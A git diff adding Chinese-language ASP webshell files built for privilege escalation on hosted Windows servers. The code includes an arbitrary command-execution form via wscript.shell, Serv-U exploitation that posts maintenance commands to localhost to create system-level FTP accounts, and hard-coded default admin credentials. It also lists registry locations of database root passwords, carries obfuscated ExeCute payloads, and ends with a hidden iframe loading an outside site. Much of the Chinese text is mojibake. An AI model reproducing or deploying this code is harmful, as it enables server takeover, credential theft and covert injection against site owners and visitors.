+	if request.Form("radiobutton") = "add" Then
+
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=" & domain &"|0.0.0.0|" & fport & "|-1|1|0" & vbCrLf & "-DynDNSEnable=0" & vbCrLf & "  DynIPName=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & fport & vbCrLf & "-User="& fuser & vbCrLf & "-Password=" & fpass & vbCrLf & _
+        "-HomeDir=" & fpath & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=" & privilege  & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=" & fpath &"|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf		
+		'--------
+		'On Error Resume Next
+		Set xPost = CreateObject("Microsoft.XMLHTTP")
+		xPost.Open "POST", "http://127.0.0.1:"& port &"/secdst",True, "", ""
+		xPost.Send loginuser & loginpass & mt & newdomain & newuser & quit
+		Set xPost =nothing
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&"  pass "&fpass&" at port "& fport &"</div>"
+	elseif request.Form("radiobutton") = "del" Then
+	
+		loginuser = "User " & user & vbCrLf
+		loginpass = "Pass " & pass & vbCrLf
+		mt = "SITE MAINTENANCE" & vbCrLf
+		deluser =  "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & port & vbcrlf & " User="& fuser & vbcrlf
+		quit = "QUIT" & vbCrLf	
+		Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+		xPost3.Open "POST", "http://127.0.0.1:"& port &"/secdst", True
+		xPost3.Send loginuser & loginpass & mt & deluser & quit 
+		Set xPOST3=nothing
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">FTP user "&fuser&"  pass "&fpass&" at port "& fport &" have deleted</div>"
+	else
+		response.write "<div align="&chr(34 )&"center"&chr(34 )&">let's Start!!!</div>"
+	end if
+end function
+Function fuzhutq1()
+RRS"<p><center>:������������������Ȩ:</p><center>"
+RRS"360ɱ��db�ļ��滻:<br>"
+RRS"c:\Program Files\360\360SD\deepscan\Section\mutex.db <br> "
+RRS"c:\Program Files\360\360Safe\deepscan\Section\mutex.db <br>"
+RRS"C:\Program Files\360\360Safe\AntiSection\mutex.db <br>"
+RRS"Flash�ļ��滻:<br>"
+RRS"C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx <br>"
+RRS"IISrewrite3 �ļ��滻��<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf<br>"
+RRS"C:\Program Files\Helicon\ISAPI_Rewrite3\error.log <br>"
+RRS"DU Meter����ͳ����Ϣ��־�ļ��滻��<br> "
+RRS"c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv <br>"
+RRS"ŵ��ɱ���ļ��滻:<br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Persist.bak <br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Validate.dat  <br>"
+RRS"c:\Program Files\Common Files\Symantec Shared\Persist.Dat  <br>"
+RRS"�����ļ��滻:<br>"
+RRS"C:\WINDOWS\hchiblis.ibl <br>"
+RRS"һ���������Ŀ¼���ļ��� <br>"
+RRS"C:\7i24.com\iissafe\log\startandiischeck.txt  <br>"
+RRS"C:\7i24.com\iissafe\log\scanlog.htm   <br>"
+RRS"�������:<br>"
+RRS"Zend: C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll  <br>"
+RRS"C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\  <br>"
+RRS"Ps:������Ȩ����ͨ���ڸ���������ϵͳ<br>"
+end function
+Function fuzhutq2()
+RRS"<p><center>:������������������Ȩ:</p><center>"
+RRS"1`c:\windows\temp����hzhost�������µ�ftp��½��¼v���û���������<br>"
+RRS"2@��mssql sa����,mysql root���뼰serv-u��administrator����<br>"
+RRS"mysql root���룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass <br>"
+RRS"sqlserver sa���룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass<br>"
+RRS"Serv-u�������룺HKEY_LOCAL_MACHINE\software\hzhost\config\settings\svrpass<br>"
+RRS"������Ϣ���hzhosts������������ϵͳ6.x �ƽ����ݿ����빤��ʹ��<br>"
+RRS"���ص�ַ���ٶ����� 'hzhosts������������ϵͳ6.x �ƽ����ݿ����빤��' <br>"
+RRS"Ps:������Ȩ����ͨ���ڴ���������ϵͳ<br>"
+end function
+Function fuzhutq3()
+RRS"<p><center>:N����������������Ȩ:</p><center>"
+RRS"Ĭ�����ݿ����أ�<br>"
+RRS"1.9�棺host_date/%23host%20%23%20date%23.mdb<br>"
+RRS"1.96�棺host_date/%23host%20%23%20date%23196.mdb <br>"
+RRS"���巽����ͨ��������ͬ������IIS,Ȼ���վ��N�����վ��Ŀ¼�£�����ͨ��������ַ���ػصõ���sa��mysql��վ���������Ϣ��key��ͨ������Ĵ�����ܣ�<br>"
+'RRS"��ַ:����Ĵ�"
+RRS"Ps:������Ȩ����ͨ���ڴ���������ϵͳ<br>"
+end function
+Function fuzhutq4()
+RRS"<font color=#00FF00>��ȴ��������2ED</font>"
+end function
+Function fuzhutq5()
+if Request("Paths") ="" then
+Paths_str="c:\windows\"&chr(13)&chr(10)&"c:\Documents and Settings\"&chr(13)&chr(10)&"c:\Program Files\"
+if Session("paths")<>"" then  Paths_str=Session("paths")
+	Response.Write "<form id='form1' name='form1' method='post' action=''>"
+	Response.Write "�˳�����Լ�����������Ŀ¼��д���,Ϊ��������ṩһЩ��ȫ�����Ϣ!<br>�����������Ŀ¼,������Զ������Ŀ¼<br>"	
+	Response.Write "<textarea name='Paths' cols='80' rows='10' class='Edit'>"&Paths_str&"</textarea>"
+	Response.Write "<br />"
+	Response.Write "<input type='submit' name='button' value='��ʼ���' / class='but1'>"
+	Response.Write "<label for='CheckNextDir'>"
+	Response.Write "<input name='CheckNextDir' type='checkbox' id='CheckNextDir' checked='checked' />����Ŀ¼  "
+	Response.Write "</label>"
+	Response.Write "<label for='CheckFile'>"
+	Response.Write "<input name='CheckFile' type='checkbox' id='CheckFile' checked='checked'  />�����ļ�"
+	Response.Write "</label>"
+	Response.Write "<label for='ShowNoWrite'>"
+	Response.Write "<input name='ShowNoWrite' type='checkbox' id='ShowNoWrite'/>"
+	Response.Write "�Խ�дĿ¼���ļ�</label>"
+	Response.Write "<label for='NoCheckTemp'>"
+	Response.Write "<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' checked='checked' />"
+	Response.Write "�������ʱĿ¼</label>"	
+	Response.Write "</form>"
+else
+Response.Write  "<a href=""?"">��������·��</a><br>"
+CheckFile = (Request("CheckFile")="on")
+CheckNextDir = (Request("CheckNextDir")="on")
+ShowNoWriteDir = (Request("ShowNoWrite")="on")
+NoCheckTemp = (Request("NoCheckTemp")="on")
+Response.Write "��������Ҫһ����ʱ�����Ե�......<br>"
+response.Flush
+
+Session("paths") = Request("Paths")
+
+PathsSplit=Split(Request("Paths"),chr(13)&chr(10)) 
+For i=LBound(PathsSplit) To UBound(PathsSplit) 
+if instr(PathsSplit(i),":")>0 then
+	ShowDirWrite_Dir_File Trim(PathsSplit(i)),CheckFile,CheckNextDir
+End If 
+Next
+Response.Write "[ɨ�����]<br>"
+end if
+end function
+Function cmd2()
+response.write"<form method='post'>"
+response.write"<input type=text name='cmd' size=60>"
+response.write"<input type=submit value='run'></form> "
+response.write"<textarea readonly cols=80 rows=20> "
+response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall
+response.write"</textarea>"
+end function
+Function suftp()
+RRS"<p><center>���ɰ汾��Ϣ:</p>"
+RRS"<form name='form1' method='post' action=''>"
+RRS"<center>����Ա:<input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'><br>"
+RRS"<center>����Ա���� :<input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'><br>"
+RRS"<center>SERV-U�˿�:<input name='dport' type='text' class='TextBox' id='dport' value='43958'><br>"
+RRS"<center>���ӵ��û���:<input name='tuser' type='text' class='TextBox' id='tuser' value='1'><br>"
+RRS"<center>���ӵ��û�����:<input name='tpass' type='text' class='TextBox' id='pass' value='1'><br>"
+RRS"<center>�ʺŵ����Ե�·��:<input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'><br>"
+RRS"<center>����˿�:<input name='tport' type='text' class='TextBox' id='tport' value='21'><br>"
+RRS"<center><input name='radiobutton' type='radio' value='add' checked class='TextBox'>ȷ������"
+RRS"<center><input type='radio' name='radiobutton' value='del' class='TextBox'>ȷ��ɾ��"
+RRS"<p><input name='Submit' type='submit' class='buttom' value='�ύ'></p></form>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+'Command = request.Form("dcmd")
+if request.Form("radiobutton") = "add" Then
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+'leaves = leaves & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
+leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _
+"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
+"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
+"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
+"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
+"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
+"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=" & tpath & "\|RWAMELCDP" & vbcrlf
+'leaves = leaves & "quit" & vbcrlf
+'--------
+On Error Resume Next
+Set xPost = CreateObject("MSXML2.XMLHTTP")
+xPost.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost.Send(leaves)
+Set xPOST=nothing
+RRS ("����ɹ�ִ�У���FTP �û���: " & tuser & " " & "����: " & tpass & " ·��: " & tpath & " :)<br><BR>")
+else
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & " User=" & tuser & vbcrlf
+Set xPost3 = CreateObject("MSXML2.XMLHTTP")
+xPost3.Open "POST", "http://127.0.0.1:"& port &"/leaves", True
+xPost3.Send(leaves)
+Set xPOST3=nothing
+RRS "<font color=#ffffff>OKOKOK</font><br><BR>"
+end if
+End Function
+Case "ScanDriveForm" 
+ ScanDriveForm
+ Case "ScanDrive"     
+  ScanDrive Request("Drive")
+  Case "ScFolder"      
+   ScFolder Request("Folder")
+case "apjdel":apjdel():case "Servu7x":su7():case "fuzhutq1":fuzhutq1():case "fuzhutq2":fuzhutq2():case "fuzhutq3":fuzhutq3():case "fuzhutq4":fuzhutq4():case "fuzhutq5":fuzhutq5():case "Cmd2":cmd2():case "suftp":suftp():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute SinfoEn("r(ErowShn he tu~rvSe>~n<ioct Aif)`l>tm/h><dybo</S~RR~",Pos)
+
+
+
+
+response.write ""+vbCrLf+""+vbCrLf+""
+%>
+<iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe>
\ No newline at end of file
diff --git a/www-7jyewu-cn/星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp b/www-7jyewu-cn/星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp
new file mode 100644
index 0000000..0354b6e
--- /dev/null
+++ b/www-7jyewu-cn/星外虚拟机提权专用asp大马 (1)_重命名_2014-10-23-14-54-16.asp	
@@ -0,0 +1,1296 @@
+<%
+UserPass="admin"'	����
+Server.ScriptTimeout=999999999
+Response.Buffer =true
+On Error Resume Next
+'------------------------�ڲ����� ��----------------------
+mmname   ="����-����-����-����������Ȩר��Webshell" 'shell����
+mmshell ="����������Ȩר��Webshell 80sec��Ʒ" 'shell��Ȩ
+errout ="������󣡣���" '���������ʾ
+serversoft=Request.ServerVariables("server_software")
+'-------------------------------------------
+
+response.write ""+vbCrLf+""+vbCrLf+""
+
+Response.Buffer = True
+Server.ScriptTimeOut=999999999
+  
+CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"
+
+
+'��·������ \ 
+function GetFullPath(path)
+	GetFullPath = path
+	if Right(path,1) <> "\" then GetFullPath = path&"\" '����ַ������ \ �ľͼ���
+end function
+
+'ɾ���ļ�
+Function Deltextfile(filepath)
+ On Error Resume Next
+ Set objFSO = CreateObject(CONST_FSO) 
+  if objFSO.FileExists(filepath) then '����ļ��Ƿ���� 
+   objFSO.DeleteFile(filepath) 
+  end if 
+ Set objFSO = nothing
+ Deltextfile = Err.Number '���ش����� 
+End Function 
+
+
+'���Ŀ¼�Ƿ��д 0 Ϊ�ɶ�д 1Ϊ��д������ɾ��
+Function CheckDirIsOKWrite(DirStr)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)
+	filepath = GetFullPath(DirStr)&fso.GettempName
+	FSO.CreateTextFile(filepath) 
+	CheckDirIsOKWrite = Err.Number '���ش����� 
+	if  ShowNoWriteDir and (CheckDirIsOKWrite =70) then
+		Response.Write "[<font color=#0066FF>Ŀ¼</font>]"&DirStr&" [<font color=red>"&Err.Description&"</font>]<br>"
+	end if
+	set fout =Nothing
+	set FSO = Nothing
+	Deltextfile(filepath) 'ɾ����
+	if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1
+end Function
+
+'����ļ��Ƿ�����޸�(�˷������޸�����,���ܻ��е㲻׼������������)
+function CheckFileWrite(filepath)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)	
+	set getAtt=FSO.GetFile(filepath)
+	getAtt.Attributes = getAtt.Attributes
+  CheckFileWrite = Err.Number 
+	set FSO = Nothing
+	set getAtt = Nothing  
+end function
+
+'���Ŀ¼�Ŀɶ�д��
+function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir)
+	On Error Resume Next
+	Set FSO = Server.CreateObject(CONST_FSO)
+	B = FSO.FolderExists(Path)
+	set FSO=nothing
+	
+  '�Ƿ�Ϊ��ʱĿ¼���Ƿ�Ҫ���
+  IS_TEMP_DIR =	(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp
+  		
+	if B=false then '�������Ŀ¼�ͽ����ļ����
+	'==========================================================================
+		Re = CheckFileWrite(Path) '����Ƿ��д
+		if Re =0 then
+			Response.Write "[�ļ�]<font color=red>"&Path&"</font><br>"
+			b =true
+			exit function
+		else
+			Response.Write "[<font color=red>�ļ�</font>]"&Path&" [<font color=red>"&Err.Description&"</font>]<br>"						
+			exit function
+		end if	
+	'==========================================================================	
+	end if
+	
+
+	
+	Path = GetFullPath(Path) '�� \	
+	
+	re = CheckDirIsOKWrite(Path) '��ǰĿ¼Ҳ���һ��
+	if (re =0) or (re=1) then
+		Response.Write "[Ŀ¼]<font color=#0000FF>"& Path&"</font><br>"
+	end if
+
+Set FSO = Server.CreateObject(CONST_FSO)
+set f = fso.getfolder(Path)
+
+
+
+if (CheckFile=True) and (IS_TEMP_DIR=false) then
+b=false
+'======================================
+for each file in f.Files
+	Re = CheckFileWrite(Path&file.name) '����Ƿ��д
+	if Re =0 then
+		Response.Write "[�ļ�]<font color=red>"& Path&file.name&"</font><br>"
+		b =true
+	else
+		if ShowNoWriteDir then Response.Write "[<font color=red>�ļ�</font>]"&Path&file.name&" [<font color=red>"&Err.Description&"</font>]<br>"			
+	end if
+next
+if b then response.Flush '��������ݾ�ˢ�¿ͻ�����ʾ
+'======================================
+end if
+
+
+
+'============= Ŀ¼��� ================
+for each file in f.SubFolders
+if CheckNextDir=false then '�Ƿ�����һ��Ŀ¼
+	re = CheckDirIsOKWrite(Path&file.name)
+	if (re =0) or (re=1) then
+		Response.Write "[Ŀ¼]<font color=#0066FF>"& Path&file.name&"</font><br>"
+	end if
+end if
+	
+	if (CheckNextDir=True) and (IS_TEMP_DIR=false) then '�Ƿ�����һ��Ŀ¼
+			ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir '�ټ����һ��Ŀ¼
+	end if
+next
+'======================================
+Set FSO = Nothing
+set f = Nothing
+end function
+
+Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next:
+ExeCute "sub ShowErr():If Err Then:RRS""<br><a href='javascript:history.back()'><br>&nbsp;"" & Err.Description & ""</a><br>"":Err.Clear:Response.Flush:End If:end sub"
+Sub RRS(str):response.write(str):End Sub
+Function RePath(S)
+RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S):RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action"):Pos=2
+RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+Serveru=request.servervariables("http_host")&url
+FolderPath=Request("FolderPath"):
+Pn=pos*44:FName=Request("FName"):pso=5:BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mmname&" - "&ServerIP&"--Soft - "&serversoft&"</title>"
+RRS ""&copyurl&""
+rrS"<style type=""text/css"">"
+rrs"body,td,center,label{font-size: 12px;background-color:#383838; color:#00ff00;SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #008000; SCROLLBAR-SHADOW-COLOR: #008000; SCROLLBAR-3DLIGHT-COLOR: #00FF00; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #000000; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #000000}"
+rrs"input,select,textarea{BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-LEFT-COLOR: #008000; BACKGROUND: #383838; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #008000; COLOR: #00ff00; BORDER-TOP-COLOR: #008000; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #008000}"
+rrs"hr{color:#00ff00}"
+rrs".C{background-color:#000;border:0px}"
+rrs".cmd{background-color:#000;color:#FFF}"
+rrs"body{margin: 0px;margin-left:4px;}"
+rrs"BODY{color:#383838}"
+rrs"a{color:#008000;text-decoration: none;}a:hover{color:#00ff00;background:#000}"
+rrs".am{color:#888;font-size:12px;}"
+rrs"</style>"
+rRs"</style>"
+ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~<rs;~`lse;}rn fa retu;else trueeturn~~))r�˲�����ȷ��Ҫִ��rm(~~confi{if (sok()on yeunctiRRS~f~`();}~ubmitorm.saddrf;top.oldere = F.valurPathFoldeform..addr){topolderder(FowFolon ShunctiRRS~f`~~;}} = ~~valueName.orm.Fhidef{top.}elseit();.submeformp.hidon;toFActiue = n.valActioform..hide){top=nullName!}if(Der~~;~~Othme = e{DNa;}elsDNameue = e.val.FNameformp.hide);to,FNam���ڣ�~~���ļ��Ƿ�ȫ����,עMdb�ļ���Ҫѹ����(~~����rompte = p{DNamdb~~)pactM~~Comion==(FActse ife;}el DNamlue =me.vam.FNadeforop.hime);t~,FNa��ͬ����~��,ע�ⲻb�ļ�ȫ���½���Md~������Ҫmpt(~= proName ~~){DteMdb~Creaon==~FActie if(;}elsDNameue = e.val.FNameformp.hide);to,FNamȫ����~~�����ļ���������Ҫ��pt(~~ promame =~){DNlder~NewFon==~~Actio if(F}elseName;|~~+D~~|||e += .valuFNameform..hide);topFName����~~,���ļ���ȫ���ƶ���Ŀ(~~����rompte = p{DNamer~~)eFold~~Movion==(FActse ife;}el+DNam|||~~= ~~|lue +me.vam.FNadeforop.hime);t~,FNa��ȫ����~��Ŀ���ļ��������ƶ�pt(~~ promame =~){DNlder~opyFo==~~Cctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ�����ƶ���Ŀ(~~����rompte = p{DNamle~~)oveFi==~~Mctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ���븴�Ƶ�Ŀ(~~����rompte = p{DNamle~~)opyFi==~~Cctionif(FAName;e = F.valuFNameform..hide){topctionme,FAm(FNallForon FuunctiRRS~f~",Pso)
+RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""�����������ݿ�"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""��ֻ��ʾһ������ʱ������ʾ�ֶε�ȫ���ֽڣ������������Ʋ�ѯʵ��.\n����һ������ֻ��ʾ�ֶε�ǰ��ʮ���ֽ�X"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>��ȷ�ϼ��������ݿ�������SQL�����������5</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""�������ݿ����Ӵ��Ƿ���ȷ!"");return false;}if(str.length<10){alert(""����SQL����Ƿ���ȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
+RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "�ļ��������":Sot(1,0) = "wscript.shell":Sot(1,2) = "������ִ�����":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS�������":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ�����":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "�������ϴ��������":Sot(5,0) = "Adodb.connection":Sot(5,2) = "���ݿ��������":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "�������ϴ����":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp �ļ��ϴ����":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "���Ʒ��ļ��ϴ����":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload �ļ��ϴ����":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail �ʼ��շ����":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "����SMTP�������":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail�������":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "���ݴ������"
+For i=0 To 13
+Set T=Server.CreateObject(Sot(i,0))
+If -2147221005 <> Err Then
+IsObj=" ��"
+Else
+IsObj=" ��"
+Err.Clear
+End If
+Set T=Nothing
+Sot(i,1)=IsObj
+Next
+
+
+
+
+If FolderPath<>"" then
+Session("FolderPath")=RRePath(FolderPath)
+End If:If Session("FolderPath")="" Then
+FolderPath=RootPath
+Session("FolderPath")=FolderPath
+End if
+Function MainForm() 
+RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<tr>X��<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>2E��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>n#��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\`��ʼe�˵�\\����\\"")'>����</a>ib��<a href='javascript:ShowFolder(""c:\\Documents and Settings\\All Users\\a��ʼp�˵�\\����\\����"")'>����</a>ib��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>LM��<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>Dv��<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Media Index\\"")'><font color=red>~���ⳣд~</font></a>:����<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>IJ��<a href='javascript:ShowFolder(""c:\\PHP"")'>PHP</a>ED��<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>WP��<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>eF<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>m?<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>v,<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>��д</a>7"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
